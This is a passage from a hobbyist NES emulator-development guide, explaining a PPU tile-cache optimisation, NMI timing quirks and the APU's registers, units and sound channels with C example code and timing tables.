uint32_t pair = *cache++;
// read pair of lines from cache
pixels [0] = ((pair >> 4) & mask) + offset; // extract pixels 1234
pixels [1] = ((pair >> 0) & mask) + offset; // extract pixels 5678
pixels += pitch; // next line
pixels [0] = ((pair >> 6) & mask) + offset; // extract pixels ABCD
pixels [1] = ((pair >> 2) & mask) + offset; // extract pixels EFGH
pixels += pitch; // next line


On a 64-bit CPU, groups of four lines (rather than two)
could be stored in each cache word, doubling the performance.

To handle masked graphics, the mask can be efficiently calculated
from the pixels by subtracting the base pixels (before offset)
from 0x80808080 and shifting right by 2. The result will have the
lower 5 bits clear for transparent pixels and set for opaque pixels;
the upper bits don't matter because those are always zero.
For example, (0x80808080 - 0x02030001) >> 2 = 0x1F9F601F.

Code:

uint32_t bg = *pixels; // get background pixels
uint32_t sp = (line >> 4) & cache_mask; // extract sprite pixels
uint32_t mask = 0x80808080 - sp; // calculate mask
*pixels = ((sp + offset) & mask) | (bg & ~mask);
// combine sprite and background

For completeness, here is a function that converts CHR data to the
cached format:

Code:

// Expands each of the 8 bits in n into separate nybbles of result.
// In: 12345678 Out: 0x15263748
uint32_t expand( uint32_t n )
{
// 12345678
// 12345678
// 12345678
// 12345678
// ---1---5---2---6---3---7---4---8
return ((n << 21) | (n << 14) | (n << 7) | n) & 0x11111111;
}

void convert_tile( const uint8_t* chr, uint32_t* cache )
{
// convert one chr tile to a cached tile
for ( int n = 4; n--; )
{
*cache++ = (expand( chr [0] ) << 0) |
(expand( chr [8] ) << 1) |
(expand( chr [1] ) << 2) |
(expand( chr [9] ) << 3);
chr += 2;
}
}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++++++++++++++++++PPU NMI quirk+++++++++++++++++++++++++++++++++++++

There are some quirks to the NMI. Reading memory mapped register
0x2002 within one PPU clock before VBLANK reads it as NMI never occured,
and it will not generate NMI for that frame. Reading it on the same clock
that the NMI is generated reads it as set, clears it, but NMI is never
triggered for that frame. Reading 2 or more PPU clocks before or after it
is set behaves normally. Writes to the 0x2000 (PPUCTRL) during vblank
that turns on 0x80 (generate nmi in vblank) bit, you can cause NMIs to be
generated. There is also a 1 cycle NMI delay when PPUSTATUS (0x2002)
bit 7 gets set in vblank.

=======NMI quirks Example=================================================

u8 read_2002()
{
/* NMI behavior for the 0x2002
this is not the full behavior of this reg,
the code included affects NMI.
NMI behavior for 0x2002
NMI gets set in ppu_run() at cycle 0 of 241
The ppu_run is called before the memory read.
this is in ppu cycles
this use scanline number -1 to 261
(reset when it hits 261) */


u8 tmp = ppu.reg[2];
//resets NMI too
if (tmp & 0x80) //vblank started, reset everything except spr0 hit
tmp &= 0x60;
if (ppu.scanline == 241) //finished drawing everything, in VBLANK
{
if (ppu.cycle == 0) //as we can see, reads back as false.
tmp &= ~0x80;
if (ppu.cycle < 3)
cpu.nmi = 0; //within 2 clocks cycles when NMI is set
//reading this turns off nmi.
//and since NMI is triggered at the end
//of an opcode, NMI never happens, because
//reading 0x2002 is using one of the opcodes
//to do it. (LDA/LDX/LDY etc)
}
return tmp;
}

void write_2000(u8 data)
{
//NMI behavior for reg 0x2000
//same scanline numbers for this as 0x2002
//not full behavior of the reg, only NMI stuff included here

//setting NMI on vblank (data & 0x80)
//and the PPU is in vblank (ppu.reg[2] & 0x80)
//and the 0x2000 reg is not currently using
//NMIs can generate an NMI

if ((data & 0x80) && !(ppu.reg[0] & 0x80) && (ppu.reg[2] & 0x80))
cpu.nmi = 1;

// writing within a few cycles (2 cycles)
// to disable nmi after vblank to
// set NMI can disable it

if ((ppu.scanline == 241) && !(data & 0x80) && (ppu.cycle < 3))
cpu.nmi = 0;

ppu.reg[0] = data;
}
==========================================================================

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

--------------------------------------------------------------------------

--------------------------------------------------------------------------
V. APU (Audio Processing Unit)

The APU is the sound unit in the NES, it runs at the same clock rate
as the CPU, as it lies on the CPU. The APU has 5 channels for generating
sound. The 5 are the 2 pulse wave channels, 1 triangle, 1 noise channel,
and 1 DMC channel (used to play DPCM). The APU outputs a sample every
cycle, making it output ~1789772 samples a second.

The pulse waves channel can has sweep capabilities (adjust the
channel's period up or down), able to silence the channel, volume
(envelope), and and frequency control. It also has a length counter that
can be used to implement fade effects, and silence the volume when its
counter reaches 0. It can make either a rectangle or square wave due to
the sequence it outputs. To figure out the frequency range of the square
wave, we figure out the lowest and highest period of the wave, the
highest for a square wave is the one with 8 as the raw timer
(square wave uses the timer as (8 << 1) + 2) so 18 cycles
is when the sequencer will change, we also halt the length counter to stop
it from changing the sequencer output, and the sequencer loops
back 8 times, giving us CPU_FREQUENCY/(CYCLE_PER_SEQUENCE*SEQUENCE_PERIOD)
1789772/(18*8) = ~12429 Hz, while the lowest frequency is
1789772/(4096*8) = ~54.62 Hz (raw timer is 0x7FF the timer is 11 bits wide)
Both pulse channels are identical in every way except it's
sweep unit covered later.

The triangle channel outputs a triangle waveform, if that wasn't
obvious. The channel has no volume control, although you can control it's
frequency. It constantly outputs a decreasing and increasing volume.
IE: 15, 14, 13....13, 14, 15
That makes a triangle shape waveform. The values is made by the
sequencer unit). The timer clocks the sequencer to move to the next
value, and the length counter can halt the sequencer, there is also a
linear counter which offers higher resolution for the halting of the
sequencer. We use the same frequency to calculate the lowest frequency
and highest frequency range. 1789772/32 = ~55930.4 Hz is the highest, while
1789772/(2048*32) = ~27.31 Hz is the lowest frequency range.

The noise channel is a LSFR (linear shift feedback register), that
generates a pseudo random number sequence used for "noise".
It has a frequency influence register on the channel, and outputs
the envelope written to a register when bit 0 of the 16 bit wide shift
register is set. More will be covered on that later. While it is a noise
channel, you can figure out the lower and upper
range of the frequency it emits, since I am not certain how to do this,
I will give the number Brad Taylor figured out, 29.3 Hz to 447 KHz.
Kevtris told me that you can measure the frequency range by digitize
the output of the noise channel, and then check with the LFSR that
generates it to see the cycle count.

The last channel of the NES is the DMC (Delta Modulated Channel).
This channel can play samples based waveform written by the programmer.
It can hold 8 bits of sample at a time, and sends a 7 bit output to the
APU mixer. It has a timer which influences the frequency it will be
played, and it can generate an IRQ at the end of playback.

++++++++++++++++++++++Terminology+++++++++++++++++++++++++++++++++++++++++

Before we continue here is the terminology for these units.

Clock:
A "clock" in the APU is when a unit outputs/modify it's own or other
unit behavior. It is implemented in the form of a counter that
counts down, and when it hits to 0, it outputs a "clock", or
change the behavior of it's own or other units.

Divider:
A divider is a form of counter that ouputs a "clock",
every N input clocks, the N input clocks is clocked by the timer,
when the timer clocks the divider, the input clock goes down, when
it hits 0, it outputs a clock.

Duty Cycle:
A duty cycle is the percent of time the unit is in an active state,
that is, when it is outputting a volume. For example, a 50%
duty cycle in an 8 sequence outputs 4 1s and 4 0s
while a 25% is 2 1s and 6 0s. Due to how phase inversion,
a 75% cycle should sound the same as a 25% one, because
it is a 180 degree shift.

Envelope:
The volume of the waveform.

Sequencer:
The sequencer loops through an array of values for output, it is
clocked, it increments and output a new value in the array, and
loops back around when it is at the last element of the array.


Timer:
The timer is a counter that counts down, when it hits 0,
a unit it controls is "clocked", which allows it to do stuff
like change the volume or change the frequency, generate IRQs, etc.
The timer is simply the CPU cycle, IE, writing 8 to a timer register means
the unit gets "clocked" in 8 cycles. The registers that sets the timer
basically sets the reload value for the timer,
the timer won't be changed immediately,
it gets reloaded when the timer counter hits 0.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++++++++++++APU Memory Map++++++++++++++++++++++++++++++++++++++++++

Here is the memory map for the APU, which lies on the CPU memory map.
All of the registers are write only except for 0x4015, which is read
and write.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+++++++++++++Pulse Wave 1 Registers+++++++++++++++++++++++++++++++++++++++

0x4000: Duty Cycle, Envelope, Halt flag
This register sets the duty cycle for the waveform, sets the
constant volume (envelope) parameter, and the halt flag (Also
known as the loop flag for the length counter.) The duty cycle
is set to a a sequence table shown later, the current position
of the sequencer is not changed, however.

Byte layout:
DDLE.EEEE (D) duty, (L) length counter halt, (E) envelope

0x4001: Sweep unit
This controls the sweep unit of the pulse wave,
the sweep unit can silence the channel, or
change the period of the wave.

Byte layout:
EPPP NSSS (E) enabled, (P) period, (N) negate, (S) shift count


0x4002: Timer lower 8 bits
This is the lower 8 bits of the 12 bit value
that makes up the timer value.
You can only set 11 bit of the 12 bit value,
basically it is %HHHL.LLLLLLL0 + 2 for the timer.

Byte layout: LLLL LLLL (timer lower 8 bit)


0x4003: Length counter load, Timer upper 3 bit
The lower 3 bits makes up the 8-10th position
of the 12 bit value, while the upper 5 bits
is the value we get from the length table. It also
resets the duty cycle (the duty cycle is restarted
at the first value of the current sequence), the envelope
is also restarted (covered later in envelope section)

Byte layout:
LLLL.LHHH (L) length counter load, (H) (timer upper 3 bit)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++Pulse Wave 2 Registers++++++++++++++++++++++++++++++++++++++++++++

0x4004: Duty Cycle, Envelope, Halt flag
This register sets the duty cycle for the waveform, sets the
constant volume (envelope) parameter, and the halt flag (Also
known as the loop flag for the length counter.) The duty cycle
is set to a a sequence table shown later, the current position
of the sequencer is not changed, however.

Byte layout:
DDLE.EEEE (D) duty, (L) length counter halt, (E) envelope

0x4005: Sweep unit
This controls the sweep unit of the pulse wave,
the sweep unit can silence the channel, or
change the period of the wave.

Byte layout:
EPPP.NSSS (E) enabled, (P) period, (N) negate, (S) shift count


0x4006: Timer lower 8 bits
This is the lower 8 bits of the 12 bit value
that makes up the timer value.
You can only set 11 bit of the 12 bit value,
basically it is %HHHL.LLLLLLL0 + 2 for the timer.

Byte layout: LLLL.LLLL (timer lower 8 bit)

0x4007: Length counter load, Timer upper 3 bit
The lower 3 bits makes up the 8-10th position
of the 12 bit value, while the upper 5 bits
is the value we get from the length table. It also
resets the duty cycle (the duty cycle is restarted
at the first value of the current sequence), the envelope
is also restarted (covered later in envelope section)

Byte layout:
LLLL.LHHH (L) length counter load, (H) (timer upper 3 bit)

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++++++++Triangle Registers++++++++++++++++++++++++++++++++++++++++++

0x4008: Length counter halt flag/linear counter control, and linear
counter reload value.
This register controls wheter or not if the sound is looped or not, and
the linear counter reload value (the time before the triangle wave stops
cycling. The linear counter is a higher resolution length counter, as you
can use fill it with an arbitary value of 7 bit precision while the length
counter value is loaded from a table.

Byte layout: CRRR.RRRR (C) Control flag/Length counter halt flag,
(R) Linear counter reload value.

0x4009: Unused
This location is unused.

0x400A: Timer lower 8 bits
This is the timer lower 8 bits of an 11 bit value, which is
%HHH.LLLLLLLL + 1.

Byte layout: LLLL.LLLL (L) Timer lower 8 bits value.

$400B: Length Counter and timer upper 3 bits.
The lower 3 bits makes up the 8-10th position
of the 11 bit value, while the upper 5 bits is the length counter load.
It sets the halt flag which is discussed later too.

Byte layout: LLLL.LHHH (L) Length counter load, (H) Timer high

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+++++++++++++++Noise Registers++++++++++++++++++++++++++++++++++++++++++++

0x400C: Length counter halt and envelope write
This register controls the length counter halt,
and sets the envelope (volume).

Byte layout: UUULE.EEEE (U) Unused, (L) Length counter halt, (E) envelope

0x400D: Unused
This location is unused

0x400E: Loop flag and the period (timer)
This register controls the loop flag for the noise,
which outputs a 93 bit sequence depending on where the position is,
or 32767 bit sequence if not. The timer is not controlled by a variable
write, and instead looked up in a table for the noise, given later.

Byte layout: LUUU.PPPP (L) Loop flag, (U) Unused, (P) Period/Timer

0x400F: Length counter load and envelope restart
This register loads the length counter value, and
then restart the envelope (set the start flag)

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++++++DMC Registers+++++++++++++++++++++++++++++++++++++++++++++++++

0x4010: IRQ Enable, loop toggle, and setting the frequency
This register determines if the IRQ flag is set or not, if
the flag is cleared, the DMC interrupt flag is cleared. The loop
flag tells the DMC wheter or not it should reloads the sample
address and sample length to start playing again, and the frequency
tells the amount of time before a sample is played.

Byte layout: ILUU.FFFF (I) IRQ enabled flag, (U) Unused,
(F) Freqency value from an index table

0x4011: Direct Load
This register directly loads a byte into the sample buffer
bypassing any read, sometimes it will not change properly, the
NESDEV community hasn't worked out this "sometimes state", so
you can ignore it in emulation.

Byte layout: UDDD.DDDD (U) Unused, (D) The value loaded

0x4012: Sample Address
This register sets the sample address for the DMC
to start playing at. It is in the form of
%11AAAAAA.AA000000 (Meaning the sample address range can be set to
[0xC000, 0xFFC0]

Byte layout: AAAAAA.AA (A) Address for the sample.

0x4013: Sample Length
This register sets the sample length of the address,
It is in the form of %LLLL.LLLL0001, meaning the range
for the sample length is [0x001, 0xFF1].

Byte layout: LLLL.LLLL (L) Sample length value.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+++++++++++++++Other APU Regs+++++++++++++++++++++++++++++++++++++++++++++

0x4015: Status register
This register returns the status register for the APU when
read, when written, this register set the DMC enable flag,
and the length counter enable for the noise/triangle/pulse channels.
When read, the frame interrupt flag gets cleared, but *NOT* the DMC
interrupt flag, if the frame interrupt flag was set at the same
moment of the read, then it will read back as 1, but it will not be
cleared. After a write, the DMC interrupt flag is cleared, but not the
frame interrupt.

Byte layout for a read: IFUD.NT21:
(I) DMC interrupt flag, (F) Frame interrupt Flag,
(U) Unused,
(D) Set if DMC bytes remaining is non-zero, unset if it is 0,
(N) Set if noise length counter is non-zero, unset if it is 0,
(T) Set if triangle length counter is non-zero, unset if it is 0,
(2) Set if pulse wave 2 length counter is non-zero, unset if it is 0.
(1) Set if pulse wave 1 length counter is non-zero, unset if it is 0.

Byte layout for a write: UUUD.NT21:
(U) Unused,
(D) If cleared, the DMC bytes remaining is set to 0, otherwise,
the DMC sample is only restarted if the DMC's bytes remaining is 0.
(N) Noise channel length counter enable flag.
(T) Triangle channel length counter enable flag.
(2) Pulse wave 2 length counter enable flag.
(1) Pulse wave 1 length counter enable flag.

0x4017: Frame counter control
This register selects a frequencer for the frame counter.
The frame counter clocks the envelope/triangle counter along
with length counter and sweep unit. It can optionally generate
an IRQ at the end.

Here is the byte layout: MIUU.UUUU
(M) Select sequencer mode, 0 for 4 step (NTSC), 5 for step (PAL),
but the NES can use both regions. The 5 step sequencer does
not generate an IRQ at the end of the sequence.
(I) Interrupt inhibit, if set, the frame interrupt flag is cleared,
otherwise, it is unaffected.

I am not sure if this is the right behavior of the APU open bus, but
it seems that the APU returns open bus based on the last byte on the CPU,
that is, whatever CPU just read PRG rom etc. the APU open bus will
return that.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+++++++++++The Gritty Details of the APU++++++++++++++++++++++++++++++++++

The APU unit basically runs the 2 pulse waves, triangle, noise, and
dmc, and the frame sequencer every cycle, and they are mixed in the APU
DAC at the end, outputting them as analog signals to make sounds.
Any changes to the unit's output by writing to a register takes effect
on the *NEXT* cycle. The APU speed is mainly judged by the timing method
you use and the downsampling algorithm you use, the APU doesn't affect
the speed as much as the PPU does.

========Code Example======================================================

void apu_run() //per cycle code...adjust this to your needs
{
pulse_run(0); //channel 1
pulse_run(1); //channel 2
triangle_run();
noise_run();
dmc_run();
frame_sequencer();
//mix samples gotten to sound API
//since the units run concurrently, the APU frame sequencer
//is ran last because
//it can change the ouput values of the pulse/triangle channels,
//we want the
//changes to affect it on the *next* cycle.
}
==========================================================================

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++++++++++++++++++++++Envelope unit+++++++++++++++++++++++++++++++++

The pulse and the noise channel have an envelope unit (volume) that
does pretty much the same thing, so I'll cover the envelope unit as one
main sub unit of itself. Here is a recap of which register controls the
envelope.
0x4000 and 0x4003 for pulse 1, 0x4004 and 0x4007 for pulse 2, and
0x400C and 0x400F for the noise channel.

Here is the byte layout: UULC.NNNN (U) means not related to envelope
in this case.

That is the byte layout for registers 0x4000, 0x4004, and 0x4007,
the N parameter is the constant output volume if the C (constant) bit
was set for one of the register, the divider period is set to N + 1
(I guess the reason is for the case is if N is 0). If the constant output
volume is not used, the envelope unit uses the counter as a volume output,
the counter is a 0 to 15 value clocked by the divider.
As for register 0x4003, 0x4007, and 0x400F, their side effects is that
they set a "start" flag which is used when the frame counter clocks the
The divider is clocked when the frame counter is clocked, which produces
1 of actions.

1) If the start flag is clear, the divider is clocked
(the divider counter is decremented),

2) If the start flag is set, the start flag is cleared,
and the counter (the 0 to 15 value one) is loaded with 15,
and the divider period's is immediately reloaded.

When the divider outputs a clock (the divider counter is 0),
if the envelope counter (0 to 15 value) is not 0, it is
decremented, if it is, it checks if the L (loop flag) is
set, if it is, then the counter is loaded with 15. (The decrementing
counter is probably used for fade effects, since the volume gets
smaller everytime.)

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+++++++++++++++++++++Length Counter Unit++++++++++++++++++++++++++++++++++

The pulse, triangle, and noise channels has the same behavior for
the length counter, so I'll cover them here like the envelope unit.
The length counter allows duration control for the channels,
when the length counter hits 0, the channel is silence. Writes to the
register 0x4015 enables length counter for the
noise/triangle/pulse 2/pulse 1 channels, if it is not enabled however,
then the length counter is forced to be 0 and cannot be changed
until enable bit is set for the specified channel.

Here is the byte layout again:
----.NT21 (N) Noise, (T) Triangle, (2) Pulse Wave 2, (1) Pulse Wave 1
for 0x4015 write, only the relevant bits to the length counter are shown.

Registers 0x4000, 0x4004, 0x400C bit 5 sets the halt length counter
flag, bit 7 of 0x4008 for the triangle channel.
It's also the envelope loop flag, since if the length counter is halted,
then the output unit always output a constant volume,
because since there is no silencing, we can't have fade effects.

Register 0x4003, 0x4007, 0x400B, 0x400F upper 5 bits
sets the value for the length counter, it is the index
for a table of length value, here is the table for the length
counter:

const unsigned char len_table[32] =
{
10,254, 20, 2, 40, 4, 80, 6, 160, 8, 60, 10, 14, 12, 26, 14,
12, 16, 24, 18, 48, 20, 96, 22, 192, 24, 72, 26, 16, 28, 32, 30
};

The length counter is loaded and then clocked by the frame counter
twice per frame. When clocked by the frame counter, the length
counter is decremented except when the counter is already 0,
or the length counter halt flag is set.

Here is the edge case behavior when one writes to the length
counter registers near the frame counter clocking. The frame counter
clocks the length counter 2 times, let say one of the clocks occured at
14915, if the register gets written to that halts the length counter flag,
the length is not clocked if it was halted at cycle 14914,
clocked at 14915 clocked when unhalted at cycle 14915, and not clocked
when unhalted at 14915. For the length counter reloading,
reload just before and after the frame counter clock works
normally, reload during the length clock when counter equals 0
also works normally, but a length counter reload when the
counter is greater than 0 should be ignored. (thats the 0x4003, etc writes)

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 ++++++++++++++++++++++++++Sweep Units+++++++++++++++++++++++++++++++++++++ 

The pulse wave channels are the only unit with the sweep unit. The
sweep unit is controlled through 0x4001 (pulse wave 1) and the 0x4005
(pulse wave 2).

Here is the byte layout for both of the regs, EPPP.NSSS

The sweep unit contains an internal shifter that continuously
(always running) calculates a result based on the raw 11 bits
timer, remember that the square timer is 12 bits so the 11 bit
you write to the register are shifted left by 1 and add by 2).
You don't really need to calculate this every cycle, just (re)calculate
it when the raw period changes (It changes through a memory write.)
The raw period is shifted by right by (S) shift count, if the
(N) negate flag is set, the shifted value is inverted, and then
added to the raw period, making the final result. For pulse wave 2,
after the value is inverted we add 1, and then add to the raw period
for the final result. Basically it is one's complement addition
for the pulse channel 1, and 2 complements addition for pulse channel 2.

When the channel is less than 8 or when the shifter result is
greater than 0x7FF and the (N) negate flag is cleared, the channel
is silenced, if the enabled flag is set and the shift count is non-zero,
the channel's raw period is set to the shifter result when the divider
outputs a clock (divider's period is (P) + 1, the
plus 1 is accounting for when (P) is 0). The divider is clocked
by the frame sequencer.

==================Sweep Unit Example Code=================================

/* we don't take account in the left shift by 1 then add 2 for the timer
raw reload value */


void wr_reg4002(u8 data)
{
pulse1_timer_raw_reload_value = (timer_reload_value & ~0xFF) | data;
calc_sweep_unit(0);
}
void wr_reg4003(u8 data)
{
pulse1_timer_raw_reload_value = (timer_reload_value & 0xFF) |
((data & 0x07) << 8));
calc_sweep_unit(0);
}
void wr_reg4006()
{
pulse2_timer_raw_reload_value = (timer_reload_value & ~0xFF) | data;
calc_sweep_unit(1);
}
void wr_reg4007()
{
pulse2_timer_raw_reload_value = (timer_reload_value & 0xFF) |
((data & 0x07) << 8));
calc_sweep_unit(1);
}
void calc_sweep_unit(int chan)
{
int c = 1 | (chan << 2);

//1's complement for chan 0, 2's complement if chan 1
if (reg[c] & 0x08) //check to see if negate is on
swp_val_result[chan] = ~swp_val_result[chan] + chan;
//add with the shifter chan
swp_val_result[chan] += timer[chan];

//we can use swp_silence as an & for pulse wave output
//IE, pulse_output & swp_silence;
if ( (timer[chan] < 8) ||
((swp_val_result[chan] > 0x7FF) && !(reg[c] & 8)) )
swp_silence[chan] = 0; //silence
else
swp_silence[chan] = 0xFF; //don't silence

}
void frame_sequencer()
{
//code that counts cycles until clocking time...
//check if sweep unit enable flag is on...
//assume in this example...
pulse1_timer_raw_reload_value = swp_val_result[0] & 0x7FF;
pulse2_timer_raw_reload_value = swp_val_result[1] & 0x7FF;
}
==========================================================================

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+++++++++++++++++Frame Sequencer++++++++++++++++++++++++++++++++++++++++++
The frame sequencer is a unit that can generate low frequency clocks
for the channels with an optional 60 Hz interrupt. There are 2 sequences
that the frame sequencer can select from, and they are selected by
writing to register 0x4017 (bit 7).

Having bit 7 unset selects a 4 step sequence, which is ~240 Hz
times a frame, the length and sweep units ~120 Hz times, and ~60 Hz
IRQ interrupt. Having the bit 7 set selects a 5 step sequence, which
is ~192 Hz times a frame, and the length and sweep units is ~96 Hz,
there is no generation of IRQ in the 5 step sequence. When writing to the
0x4017 register, the step sequencer resets the position, starting from
the beginning.

To get the cycles when the frame counter takes a step,
you simply do CPU_FREQUENCY/FRAME_SEQUENCE_HZ.
1789772/240 = ~7457 cycles for NTSC,
1662607/192 = ~8659 cycles for PAL.

Blargg made an accurate table describing
exactly when the frame sequencer takes a step, thanks!
Here it is:

Action Envelopes & Length Counter& Interrupt Delay to next
Linear Counter Sweep Units Flag NTSC PAL
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
$4017=$00 - - - 7459 8315
Step 1 Clock - - 7456 8314
Step 2 Clock Clock - 7458 8312
Step 3 Clock - - 7458 8314
Step 4 Clock Clock Set if enabled 7458 8314

Mode 1: 5-step sequence

Action Envelopes & Length Counter& Interrupt Delay to next
Linear Counter Sweep Units Flag NTSC PAL
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
$4017=$80 - - - 1 1
Step 1 Clock Clock - 7458 8314
Step 2 Clock - - 7456 8314
Step 3 Clock Clock - 7458 8312
Step 4 Clock - - 7458 8314
Step 5 - - - 7452 8312

Note: the IRQ flag is actually effectively set three clocks in a row,
starting one clock earlier than shown. NTSC and PAL times shown for
comparison.

As we can see, the 5 step sequence has a 1 cycle delay then it clocks the
length counter and sweep units right away, as documented by blargg also,
the IRQ is set 3 times in a row in 3 cycles (29830, 29831, 29832 for
example in NTSC). What happens to the units as they are clocked is
described in their individual sections.

++++++++++++++++++++Pulse Wave Channels+++++++++++++++++++++++++++++++++++

The pulse wave unit can be described by a diagram here
(taken from nesdevwiki, thanks!)

Timer ---> Sequencer Sweep Length Counter
| | |
| | |
v v v
Envelope -------> Gate-----> Gate -----> Gate ---> (to mixer)

The timer is set by the registers forming %HHHL.LLLLLLL0 value + 2,
I am guessing the justification for the shift is because they wanted
a lower frequency range to be in the human's
audible range, since without the shift, the highest frequency is
>20 kHz, while the human hearing range is only 20 kHz. The plus 2
instead of plus 1 is because the timer can also be looked as
(timer + 1) << 1, so in a way, it does make sense, the hardware
probably added the 1 to account for the timer raw period being 0,
and then shifted it. As the timer counts down to 0, it gets reloads
its value from the value we wrote to the registers (0x4002 and 0x4006,
0x4003 and 0x4007) and it increments the sequencer value,
the sequencer outputs an 8 bit sequence depending on the duty cycle
we wrote to the register (0x4000 upper 2 bits).
Here is the table for the duty cycles,

Duty Cycle Sequences
Duty Waveform sequence
0: 0 1 0 0 0 0 0 0 (12.5%)
1: 0 1 1 0 0 0 0 0 (25%)
2: 0 1 1 1 1 0 0 0 (50%)
3: 1 0 0 1 1 1 1 1 (25% negated (75%))

I am not sure why the NES had a 75% since 75% is a 180 degree out of phase
with 25%, so theoretically it should sound the same. When the sequencer
is at a 1 then the envelope is outputted, either the constant volume or
the envelope counter, when it is 0, the channel is silenced. If the
envelope manages to get through the sequencer without being silenced,
then it goes through the sweep, where it gets calculated by the internal
shifter, the sweep can silence the envelope if the raw period
is less than 8 or the shifter value is over 0x7FF and the sweep unit's
negate flag is cleared, then the channel is silenced, then it goes
through the length counter, if the length counter is not 0, then the
sample can finally be outputted. The behavior is for pulse wave 1 and 2
channel are the same, the only difference is their sweep units documented
in the sweep section.

=========Pulse Wave Code Example==========================================

void pulse_run(int chan) //this example code runs every cpu cycle
{
//sweep units are figured out during memory writes to the regs
//that set the timer, length counter are figured out in the
//writes and frame counter, and envelope is set through the memory
//regs also, so we just need to deal with the timer and sequencer here

if (!--timer_period[chan])
{
sq_seq[chan] = (sq_seq[chan] + 1) & 7;
//reload timer
timer_period[chan] = timer[chan] + 2;
}
if (sq_seq[chan]) //we are outputting something
{
if (envelope_is_constant_for_this_chan)
sample[chan] = envelope_value;
else
sample[chan] = envelope_cnt_value;

sample[chan] &= sweep_silence_or_not;

if (!len_cnt[chan]) //length counter is 0
sample[chan] = 0; //silenced
}
else
sample[chan] = 0; //duty cycle is 0, silenced.

}

==========================================================================

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+++++++++++++++++++++Triangle Channel+++++++++++++++++++++++++++++++++++++

The triangle wave unit can be described by a diagram here
(taken from nesdevwiki, thanks!)

Linear Counter Length Counter
| |
v v
Timer ---> Gate ----------> Gate ---> Sequencer ---> (to mixer)

The timer reload period is set from the 0x400A and 0x400B
register plus 1 (for cases of when the raw reload period is 0).
When it hits 0, it reloads itself using that value. When the
timer ouputs a clock, it clocks the sequencer, that is, increment
the index value only if the linear counter and the length counter
is not 0.

The linear counter is clocked by the frame sequencer
shown above in the table, here are the 2 actions that
occurs when the frame sequencer clocks the linear counter.

1. If the halt flag (the halt flag is automatically set on writes
to 0x400B) is set, the linear counter is reloaded with
the counter reload value, otherwise if the linear counter is non-zero,
it is decremented.

2. If the control flag (bit 7 of 0x4008) is clear, the halt flag
is cleared.

The sequencer sends a 32 looped sequence to the APU mixer.

const unsigned char triangle_sample_val[32]
{
15, 14, 13, 12, 11, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15
};
========Code example for the triangle channel=============================
void triangle_run() //per cycle code
{
//when clocked by timer
//seq steps forward
//except when linear counter or
//length counter is 0

//length counter and linear counter
//is clocked in frame counter.
if (!--triangle_timer_period)
{
if (tri_len_cnt && tri_linear_cnt)
tri_seq = (tri_seq + 1) & 0x1F;
triangle_timer_period = tri_timer_reload + 1;
}
triangle_sample = triangle_sample_val[tri_seq];
}
==========================================================================

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+++++++++++++++++++++++Noise Channel++++++++++++++++++++++++++++++++++++++

The noise unit can be described by a diagram here
(taken from nesdevwiki, thanks!)

Timer --> Shift Register Length Counter
| |
v v
Envelope -------> Gate ----------> Gate --> (to mixer)


The timer is looked up in a table from writes to bit 0 to 3,
which sets the reload value. Here is the table,

Rate: 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 0x08 0x09
0x0A 0x0B 0x0C 0x0D 0x0E 0x0F
-----------------------------------------------------------
NTSC: 4, 8, 16, 32, 64, 96, 128, 160, 202,
254, 380, 508, 762, 1016, 2034, 4068
PAL: 4, 7, 14, 30, 60, 88, 118, 148, 188, 236,
354, 472, 708, 944, 1890, 3778

The table corresponds to a note on musical note.

As the timer counts to 0, it gets reloaded with the timer value, and the
timer clocks the shift register (the pseudo random number sequence 16 bit
wide).

1. Bit 15 of the shift register is replaced with the XOR of
bit 0 and one other bit: bit 6 if loop flag (bit 7 of 0x400E)
is set, otherwise bit 1. Shift register bits: %F-------.-6----10
2. The shift register is then shifted right one, the original bit 0 is
lost.

The envelope is outputted to the mixer when the bit 0 of the
shift register is unset or when the length counter is not 0,
the shift register is loaded with 1 on power up (LSFR needs a initial
state, if it was 0, then nothing would change.)

The result is a pseudo random bit sequence 32767 bits long when the loop
is set. When the loop is cleared, it is 93-bit long sequence somewhere
in the 32767 sequence depending on when the loop flag was set.
A simple program can be written to calculate how long it is.
When the noise channel is silence, one can get away from doing the
tedious calculation every single cycle by looking ahead N amount of
value, blargg wrote a program that generates the bit operation
for the N lookahead formula that matches the behavior that takes N cycles
of the standard XORing and such. You can get the program that generates it
here: http://h1.ripway.com/blargg/temp/iterated_lfsr.zip, so for when the
noise is silenced and then turned back on, you can just figure out how
many cycles it had been since and apply the lsfr look ahead.

==========Code Example for the Length of the Bit Sequence=================

#include <stdio.h>
int main(void)
{
unsigned long loop_flg_unset = 0, loop_flg_set = 0;
unsigned int reg = 1;
do
{
reg &= 0x7FFF;
reg |= (((reg & 0x01) ^ ((reg & 0x02) >> 1)) << 15);
reg >>= 1;
++loop_flg_unset;
} while (reg != 1);

do
{
reg &= 0x7FFF;
reg |= (((reg & 0x01) ^ ((reg & 0x40) >> 6)) << 15);
reg >>= 1;
++loop_flg_set;
} while (reg != 1);

printf("Unset: %d Set: %d\n", loop_flg_unset, loop_flg_set);
return 0;
}
==========================================================================

==============Code Example for Noise Channel==============================

